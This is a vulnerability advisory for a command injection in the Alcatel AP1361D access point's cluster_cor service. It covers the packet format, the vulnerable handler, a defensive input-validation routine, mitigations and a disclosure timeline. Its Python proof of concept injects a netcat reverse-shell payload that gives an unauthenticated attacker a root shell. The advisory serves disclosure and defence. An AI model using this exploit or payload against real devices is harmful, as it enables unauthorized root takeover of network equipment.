CVE-2025-52690: Alcatel AP1361D Command Injection in cluster_cor service

CVSS Score: 9.6 Critical (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Product overview

The Alcatel AP1361D is an enterprise WiFi access point.

Analysis and exploitation of this vulnerability were performed on firmware version 4.0.4, build 2046.

Vulnerability summary

The Alcatel AP1361D cluster_cor service does not sanitize the username specified by the user before using it as part of a system command.

By including special characters such as ; in the username, an unauthenticated attacker can execute arbitrary commands with root privileges on the device.

Vulnerability details

cluster_cor is a service that listens on UDP port 32769. Communication with this service is conducted over a binary protocol (based on strings in the firmware, it seems that this protocol is called hccp).

The packet format can be represented by the following struct:

```c
#include <stdint.h>

struct __attribute__((packed)) packet
{
    char padding[0x3];
    char type;
    int16_t field_4;
    uint32_t cluster_id;
    char opcode;
    char padding2[0x5];
    char buf[0x60];
};
```

If the packet has type 6 and opcode 7, the following handler is executed:

```c
case 7:
{
    sprintf(&cmd_buf, "uci -c /tmp  set  sessionId.%s.sessionId=\'%s\'",
            &packet.buf, &packet.buf + 0x10);
    system(&cmd_buf);
    sprintf(&cmd_buf, "uci -c /tmp  set  sessionId.%s.sessionValidity=\'%s\'",
            &packet.buf, &packet.buf + 0x50);
    system(&cmd_buf);
    __builtin_strcpy(&cmd_buf, "uci -c /tmp commit sessionId ");
    system(&cmd_buf);
    break;
}
```

Similar to CVE-2025-52688, packet->buf, presumed to be the username, is directly interpolated into a uci command without sanitization. However, unlike CVE-2025-52688, this use of uci appears to be intended to create a session. Thus, this opcode might be for syncing user sessions between devices of the same cluster.

Whatever this opcode's purpose is, it can be accessed by unauthenticated users, thus allowing them to execute arbitrary commands as the root user.
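As an added defensive illustration (this is not Alcatel's code or the vendor's fix), here is how the opcode 7 handler could consume the three fields without this bug: each fixed-width field is copied with an explicit bound, checked against the character set uci allows for section and option names, and assembled into a single argv element intended for execv() rather than a string handed to system(). The field widths (0x10, 0x40 and 0x10 bytes) are assumptions inferred from the offsets in the decompiled handler.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets inside packet.buf (username +0x00, sessionId +0x10, sessionValidity
   +0x50) come from the handler above; the field widths are assumptions that
   make each field end where the next begins or where the 0x60 buffer ends. */
#define USER_MAX 0x10
#define SID_OFF  0x10
#define SID_MAX  0x40
#define VAL_OFF  0x50
#define VAL_MAX  0x10

/* Copy a fixed-width, possibly unterminated field into a C string, accepting
   only [A-Za-z0-9_] (the characters uci allows in section and option names).
   Returns 0 on success, -1 for an empty field or any other byte, so a ';' in
   the username is rejected before any command string exists. */
static int copy_safe_field(const uint8_t *buf, size_t off, size_t max,
                           char *out, size_t outsz)
{
    size_t n = 0;
    while (n < max && buf[off + n] != '\0')
        n++;
    if (n == 0 || n >= outsz)
        return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = buf[off + i];
        if (!isalnum(c) && c != '_')
            return -1;
    }
    memcpy(out, buf + off, n);
    out[n] = '\0';
    return 0;
}

/* Build the single argv element "sessionId.<user>.<option>=<value>" for
   "uci -c /tmp set", meant to be passed through execv() instead of system()
   so no shell ever parses packet data. Returns 0 on success, -1 on reject. */
int build_uci_set_arg(const uint8_t *buf, const char *option, size_t val_off,
                      size_t val_max, char *out, size_t outsz)
{
    char user[USER_MAX + 1], val[SID_MAX + 1];
    if (copy_safe_field(buf, 0, USER_MAX, user, sizeof user) != 0 ||
        copy_safe_field(buf, val_off, val_max, val, sizeof val) != 0)
        return -1;
    int n = snprintf(out, outsz, "sessionId.%s.%s=%s", user, option, val);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}
```

The caller would invoke the function twice (for "sessionId" with SID_OFF/SID_MAX and for "sessionValidity" with VAL_OFF/VAL_MAX) and pass the results as argv entries to uci; a -1 from either call means the packet is dropped before anything is executed.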

PS: The vulnerable function is so large that IDA refused to decompile it. Luckily, Binary Ninja handled it with ease.

PoC script

```python
from pwn import *
import argparse

# Suppress all log messages except for errors
context.log_level = 'error'

# Set up argument parser
parser = argparse.ArgumentParser(description="Start a TCP listener on 0.0.0.0:lport")
parser.add_argument("--rhost", required=True, help="Remote host IP address")
parser.add_argument("--lhost", required=True, help="Local host IP address")
parser.add_argument("--lport", required=True, type=int, help="Local port to listen on")

# Parse arguments
args = parser.parse_args()

# Extract the arguments
rhost = args.rhost
lhost = args.lhost
lport = args.lport

# Start a TCP listener on 0.0.0.0:lport
listener = listen(lport)
print(f"Listening on 0.0.0.0:{lport}")

context.endian = 'big'

print(f"Running exploit against {rhost}:{0x8001}")
r = remote(rhost, 0x8001, typ='udp')

r.sendline(b"\x01"*3+b"\x06\x02\x03"+p32(100)+b"\x07"+b"c"*5+f";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f;".encode())
r.close()

conn = listener.wait_for_connection()
print(f"Connection received from {conn.rhost}")

conn.interactive()
```

Demo video

Exploit conditions

Any unauthenticated attacker with network access to the Alcatel AP1361D device can exploit this vulnerability.

Mitigations

Alcatel recommends that users of the affected product update to the latest version. If updating to the latest version is not possible, the workaround is to manage the affected product in Enterprise Mode with the OmniVista Management platform and disable the web interface.

We are unable to assess the security of the mitigations implemented by Alcatel, as they have not granted us access to the updated firmware.

Timeline

  • 2024-08-17: Report submitted to SpiritCyber IoT Hackathon triage team
  • 2024-08-??: Report accepted by triage team
  • ???
  • 2025-04-21: CSA SingCert requests the firmware version of the affected device on behalf of Alcatel, we respond within the same day
  • 2025-06-25: CSA SingCert assigns CVE-2025-52690
  • 2025-07-16: Public disclosure